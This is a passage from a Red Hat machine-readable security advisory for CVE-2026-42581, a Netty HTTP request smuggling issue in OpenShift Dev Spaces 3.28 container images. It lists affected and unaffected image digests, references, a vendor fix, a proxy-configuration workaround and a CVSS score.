"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:3eda021137370af8e8cf2c996a7a10733824f1d23e56534efd4f46aa40ce7777_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:af397f83a7394b676299501672623ca9c01b8351db0d73531b0bf325e55558f6_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b73dc3b1ac96a877aba609233dc0ae60685716b272e3dc1f8db59c23c438049d_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:cef4269f4d91814bc144c94718d6aa59c4e03eab341eebf87ec05e38e7b7e49f_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:06d061cdda5ac9ddd48647c2c86b5ceb5a5f25acc7e314ebb319a690af588209_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:80842e498a91358d73a511ec25acc2a6d26dca76c9f775108778700e8541c252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:a062fd2a510100fc03a5f14102104a34b2e24bddc5661ac95ed39dad6a5f46b9_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fbdf611c5aac4e33644ed8eb5a72b88b5c5a6690f24a64a3cff7002a483827d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:4f63b37a50013481f95ca70ea3e0baf257601aa86ba6dd3efe5ad039b3170f04_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:56f4b3132a1785e7a323fc9fb5e1d2040d30a7c8d81fd00a42d619a8881e9492_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:e2d0551322d379e77a72218fb37244f8a187e6ff52ae6f61e7b673c2c23ce39f_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:f8200f2b4b8c5cb5a5aef1fa6f8f15297cb720512a0df784629129afc0d5810a_s390x"
],
"known_not_affected": [
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:7e20cd1d638296bcab93a704bfce3ff7cf6c0f7e632e07e69fcacfedf9e8b120_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:83e1013b0ce89c1f4fc0038c1cb7eab2fd541a6fb1de6a0596fe669a76cde1f4_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:9d47eee451c3d7c7a0c2d83824849ac4053110107997a41df26fe28f9b4749de_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:bb9e332650eb73ce20accc25d8bc73bb935e39e0bc6a9b0e7b163707ae25ce6f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0ce3e6baa0af251b5ae5e8cc64de363aa144c420e1416a2a7bf522aefe0b6dd3_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:324758a4c214f743ba3f38eee3ae2c3f42eac80ac4c10801e103fc531d73cf51_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:82994d108c21e3f53c2d87bdec8ddcdb0c0f81c7f1ed93ac996fe83046ea8ed1_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:b1b3d7416bc5c1609fa890229fc0a0809bc1906813bb4834f57dc610f88974c1_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:5bcd49999db0f7ac5fbc2461c7ac50dec267ee8b4f64c95bdcd746188ab0bfa0_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:62ecbc41b3f1d3cd81e9593fdacac8397d1fc3f616717b247346ac218b7a2ff7_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ee3d2e13995479495aa2a2f3b7a8f8133f7b69d0e753b00e3fe2ee00416b3a9_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:b52e83ecc17aefda4a83671c267b3086bb5f92d78259c3e3b2b389042bac7230_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:1cef563af30567f7aba3baeb6fa94494f93ac07350a23fabaa67d079f780f640_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ae7dc192f8ca8c78dc6eb12ef2846b45057e22e183207743aad9261fb5adcb6e_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ca07c7ae5cdcf93df21348d92c4828e4615b324f2f765907b3459f0d5090c628_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:dee20a799ccf5bae94ed50fd2d79ea162cd7384990427db93281fe590d6c7767_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:f78d91e983f0f8be019382c2fb620a655bf9f8204bd839e9bfb9c35e1ab8fc90_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4757ac1e8c5a53e2d9a7ce896dbcc1232806a47a29470285c6fee9778a2f0b25_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4e4a72be08cf691ee40dc79d2e625a5b59cf709e15219537ee04a1f03a3df23e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a5b3c16ca82c2585debbef262d8de80bb8566384c916915d9fce92d233268d1c_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:dd4b506d04a2e7be2c62c53a7e1f60fe828ba7f0fc2aab7f6a752f1a4c4e699b_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:21d1288562fc757e4714cde2c253c077fba1b7762ab4041e8b3f55d9da1e7b82_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:2423f169dcd795c9326d59d953b4507485bf2ef8971f066969dfb2ca921bdf1f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:5e4c074f39614f529e79c8de011446a0b621fb189485eff0061f95f99f0950f8_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:f1cf981295bdfddb68c8cb83e03da7cbec9aada7dce16586a1508351b11c2e73_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0de97d2e0e6589cfd3889eca0284154e857c4deef4ab45420e0d75bfc8030252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:12a042cb9e94c6502b61c6d08a49bc8b81f8d3e23932b08c29566906508801d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:25137cf516214eac04d5f1fd2ad9a38658e8fc741600b50b4c44f00db437cf01_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:5cb0df6d628f764eead0f67206b7251b737932ae04f81dd8c1fd416d2c1be455_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:060059363ac7718e9599e0612c95b583b563fac5a6616dfecc9c42413b2a3f56_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:1bd73bae94af4a5be1b62e555df3a1b863f22c427f95d2bbbd24e4ffcce7a264_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:baff02ec968933899873d989d8faf4fb27aedcbca5406009408638678a832b96_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:e9347202b67b4a2ad17b820af7148d4473764996ce1368d5460b6fff2d79935a_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:0912cc02b70a7cc6895cdfde15647865de99f03880715c6b8e584adf70c14707_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1d4269b06d396a7ec1e952daa47a4bd5b00915d6d0cd5a3270fe471a6a75517b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1e2b5bff8974b54038cf635faaa293458bcfa2e75a9ee57e2712b30d9b35e0ac_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:6798e67f7d39b831b6c947a50c4420c9d92160079bbd2d62d07b9f991be4abfd_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:1a56d8592fe048ebe0c1549ec0249a5f61842cbb5c58545649b394df98fbae06_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:224939e501ffed4ffe09a5198138486e72b04d1486787a6c4c3abee8cd7dffba_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:c10a24ed873306c38e5d7aa96d9ffa9b71b2e6dac2ee18f557af008ef460d708_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:cb73c78e8214996408490b36f176be3b6d0047a116f705478afd162c8260292d_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:06172d66fc92096c6d1b517ac2edfc35e06255859152ea8aa83ea57bb789bb0b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:2268f482a70624ca1670675df27f0a6a4e7ea41669f021059ebafbc0465d5411_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:505295ab2811eb723a334501a853eb238c2ec96073f36296226d58fa12aefd3c_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:93ae4574a68c0f16acf2146ab09b56e446fd012697c1194cfa9f4ac717a300c2_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:2f672c4b1bc77639a5ccf2f7f923691aefe2ab2e6e76de830a0727633c80af17_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:763e7470768ecf6551d9d9af7a7a48605ceafaad3e001f48ae08ce94d6facb42_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:80c9c0c3aa02ae7b447c33a8bb9aff07fc243b2b484db28975b79b9007612629_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:8a4c7ae0ffaa1f6d3b87c60d27817a3d1636a5609cf159dce66d80c2f0ad6f9b_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42581"
},
{
"category": "external",
"summary": "RHBZ#2477232",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477232"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42581",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42581"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42581",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42581"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-xxqh-mfjm-7mv9",
"url": "https://github.com/netty/netty/security/advisories/GHSA-xxqh-mfjm-7mv9"
}
],
"release_date": "2026-05-13T17:54:44.492000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-10T19:42:14+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:3eda021137370af8e8cf2c996a7a10733824f1d23e56534efd4f46aa40ce7777_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:af397f83a7394b676299501672623ca9c01b8351db0d73531b0bf325e55558f6_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b73dc3b1ac96a877aba609233dc0ae60685716b272e3dc1f8db59c23c438049d_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:cef4269f4d91814bc144c94718d6aa59c4e03eab341eebf87ec05e38e7b7e49f_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:06d061cdda5ac9ddd48647c2c86b5ceb5a5f25acc7e314ebb319a690af588209_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:80842e498a91358d73a511ec25acc2a6d26dca76c9f775108778700e8541c252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:a062fd2a510100fc03a5f14102104a34b2e24bddc5661ac95ed39dad6a5f46b9_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fbdf611c5aac4e33644ed8eb5a72b88b5c5a6690f24a64a3cff7002a483827d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:4f63b37a50013481f95ca70ea3e0baf257601aa86ba6dd3efe5ad039b3170f04_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:56f4b3132a1785e7a323fc9fb5e1d2040d30a7c8d81fd00a42d619a8881e9492_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:e2d0551322d379e77a72218fb37244f8a187e6ff52ae6f61e7b673c2c23ce39f_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:f8200f2b4b8c5cb5a5aef1fa6f8f15297cb720512a0df784629129afc0d5810a_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:25123"
},
{
"category": "workaround",
"details": "To mitigate this issue, configure any reverse proxies or load balancers in front of Netty to either reject HTTP/1.0 requests containing both Transfer-Encoding: chunked and Content-Length headers, or to explicitly prioritize the Transfer-Encoding header over Content-Length for HTTP/1.0 traffic. This ensures consistent interpretation of message boundaries and prevents request smuggling attacks.",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:7e20cd1d638296bcab93a704bfce3ff7cf6c0f7e632e07e69fcacfedf9e8b120_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:83e1013b0ce89c1f4fc0038c1cb7eab2fd541a6fb1de6a0596fe669a76cde1f4_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:9d47eee451c3d7c7a0c2d83824849ac4053110107997a41df26fe28f9b4749de_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:bb9e332650eb73ce20accc25d8bc73bb935e39e0bc6a9b0e7b163707ae25ce6f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0ce3e6baa0af251b5ae5e8cc64de363aa144c420e1416a2a7bf522aefe0b6dd3_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:324758a4c214f743ba3f38eee3ae2c3f42eac80ac4c10801e103fc531d73cf51_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:82994d108c21e3f53c2d87bdec8ddcdb0c0f81c7f1ed93ac996fe83046ea8ed1_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:b1b3d7416bc5c1609fa890229fc0a0809bc1906813bb4834f57dc610f88974c1_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:5bcd49999db0f7ac5fbc2461c7ac50dec267ee8b4f64c95bdcd746188ab0bfa0_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:62ecbc41b3f1d3cd81e9593fdacac8397d1fc3f616717b247346ac218b7a2ff7_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ee3d2e13995479495aa2a2f3b7a8f8133f7b69d0e753b00e3fe2ee00416b3a9_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:b52e83ecc17aefda4a83671c267b3086bb5f92d78259c3e3b2b389042bac7230_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:1cef563af30567f7aba3baeb6fa94494f93ac07350a23fabaa67d079f780f640_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ae7dc192f8ca8c78dc6eb12ef2846b45057e22e183207743aad9261fb5adcb6e_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ca07c7ae5cdcf93df21348d92c4828e4615b324f2f765907b3459f0d5090c628_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:dee20a799ccf5bae94ed50fd2d79ea162cd7384990427db93281fe590d6c7767_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:f78d91e983f0f8be019382c2fb620a655bf9f8204bd839e9bfb9c35e1ab8fc90_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4757ac1e8c5a53e2d9a7ce896dbcc1232806a47a29470285c6fee9778a2f0b25_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4e4a72be08cf691ee40dc79d2e625a5b59cf709e15219537ee04a1f03a3df23e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a5b3c16ca82c2585debbef262d8de80bb8566384c916915d9fce92d233268d1c_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:dd4b506d04a2e7be2c62c53a7e1f60fe828ba7f0fc2aab7f6a752f1a4c4e699b_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:21d1288562fc757e4714cde2c253c077fba1b7762ab4041e8b3f55d9da1e7b82_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:2423f169dcd795c9326d59d953b4507485bf2ef8971f066969dfb2ca921bdf1f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:5e4c074f39614f529e79c8de011446a0b621fb189485eff0061f95f99f0950f8_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:f1cf981295bdfddb68c8cb83e03da7cbec9aada7dce16586a1508351b11c2e73_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0de97d2e0e6589cfd3889eca0284154e857c4deef4ab45420e0d75bfc8030252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:12a042cb9e94c6502b61c6d08a49bc8b81f8d3e23932b08c29566906508801d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:25137cf516214eac04d5f1fd2ad9a38658e8fc741600b50b4c44f00db437cf01_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:5cb0df6d628f764eead0f67206b7251b737932ae04f81dd8c1fd416d2c1be455_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:060059363ac7718e9599e0612c95b583b563fac5a6616dfecc9c42413b2a3f56_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:1bd73bae94af4a5be1b62e555df3a1b863f22c427f95d2bbbd24e4ffcce7a264_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:baff02ec968933899873d989d8faf4fb27aedcbca5406009408638678a832b96_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:e9347202b67b4a2ad17b820af7148d4473764996ce1368d5460b6fff2d79935a_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:3eda021137370af8e8cf2c996a7a10733824f1d23e56534efd4f46aa40ce7777_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:af397f83a7394b676299501672623ca9c01b8351db0d73531b0bf325e55558f6_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b73dc3b1ac96a877aba609233dc0ae60685716b272e3dc1f8db59c23c438049d_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:cef4269f4d91814bc144c94718d6aa59c4e03eab341eebf87ec05e38e7b7e49f_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:06d061cdda5ac9ddd48647c2c86b5ceb5a5f25acc7e314ebb319a690af588209_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:80842e498a91358d73a511ec25acc2a6d26dca76c9f775108778700e8541c252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:a062fd2a510100fc03a5f14102104a34b2e24bddc5661ac95ed39dad6a5f46b9_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fbdf611c5aac4e33644ed8eb5a72b88b5c5a6690f24a64a3cff7002a483827d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:4f63b37a50013481f95ca70ea3e0baf257601aa86ba6dd3efe5ad039b3170f04_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:56f4b3132a1785e7a323fc9fb5e1d2040d30a7c8d81fd00a42d619a8881e9492_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:e2d0551322d379e77a72218fb37244f8a187e6ff52ae6f61e7b673c2c23ce39f_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:f8200f2b4b8c5cb5a5aef1fa6f8f15297cb720512a0df784629129afc0d5810a_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:0912cc02b70a7cc6895cdfde15647865de99f03880715c6b8e584adf70c14707_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1d4269b06d396a7ec1e952daa47a4bd5b00915d6d0cd5a3270fe471a6a75517b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1e2b5bff8974b54038cf635faaa293458bcfa2e75a9ee57e2712b30d9b35e0ac_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:6798e67f7d39b831b6c947a50c4420c9d92160079bbd2d62d07b9f991be4abfd_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:1a56d8592fe048ebe0c1549ec0249a5f61842cbb5c58545649b394df98fbae06_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:224939e501ffed4ffe09a5198138486e72b04d1486787a6c4c3abee8cd7dffba_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:c10a24ed873306c38e5d7aa96d9ffa9b71b2e6dac2ee18f557af008ef460d708_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:cb73c78e8214996408490b36f176be3b6d0047a116f705478afd162c8260292d_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:06172d66fc92096c6d1b517ac2edfc35e06255859152ea8aa83ea57bb789bb0b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:2268f482a70624ca1670675df27f0a6a4e7ea41669f021059ebafbc0465d5411_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:505295ab2811eb723a334501a853eb238c2ec96073f36296226d58fa12aefd3c_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:93ae4574a68c0f16acf2146ab09b56e446fd012697c1194cfa9f4ac717a300c2_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:2f672c4b1bc77639a5ccf2f7f923691aefe2ab2e6e76de830a0727633c80af17_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:763e7470768ecf6551d9d9af7a7a48605ceafaad3e001f48ae08ce94d6facb42_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:80c9c0c3aa02ae7b447c33a8bb9aff07fc243b2b484db28975b79b9007612629_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:8a4c7ae0ffaa1f6d3b87c60d27817a3d1636a5609cf159dce66d80c2f0ad6f9b_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:7e20cd1d638296bcab93a704bfce3ff7cf6c0f7e632e07e69fcacfedf9e8b120_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:83e1013b0ce89c1f4fc0038c1cb7eab2fd541a6fb1de6a0596fe669a76cde1f4_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:9d47eee451c3d7c7a0c2d83824849ac4053110107997a41df26fe28f9b4749de_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:bb9e332650eb73ce20accc25d8bc73bb935e39e0bc6a9b0e7b163707ae25ce6f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0ce3e6baa0af251b5ae5e8cc64de363aa144c420e1416a2a7bf522aefe0b6dd3_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:324758a4c214f743ba3f38eee3ae2c3f42eac80ac4c10801e103fc531d73cf51_arm64",
